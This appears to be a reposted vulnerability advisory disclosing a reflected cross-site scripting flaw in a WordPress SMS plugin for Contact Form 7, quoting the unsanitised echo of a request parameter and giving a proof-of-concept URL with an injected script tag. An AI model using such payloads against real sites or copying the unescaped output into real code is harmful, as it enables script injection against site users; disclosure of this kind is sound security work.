International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting
2020-10-29 00:58:37 Author: cxsecurity.com(查看原文) 阅读量:174 收藏
2020-10-29 00:58:37 Author: cxsecurity.com(查看原文) 阅读量:174 收藏
[-] Title : International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting [-] Author : Milad Karimi [-] Vendor : https://wordpress.org/plugins/cf7-international-sms-integration/ [-] Category : Webapps [-] Date : 2020-10-27 Vulnerable Page: /class-sms-log-display.php Vulnerable Source: 366: echo echo $_REQUEST['page']; Exploit: http://localhost/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=<script>alert("test")</script>
文章来源: https://cxsecurity.com/issue/WLB-2020100175
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh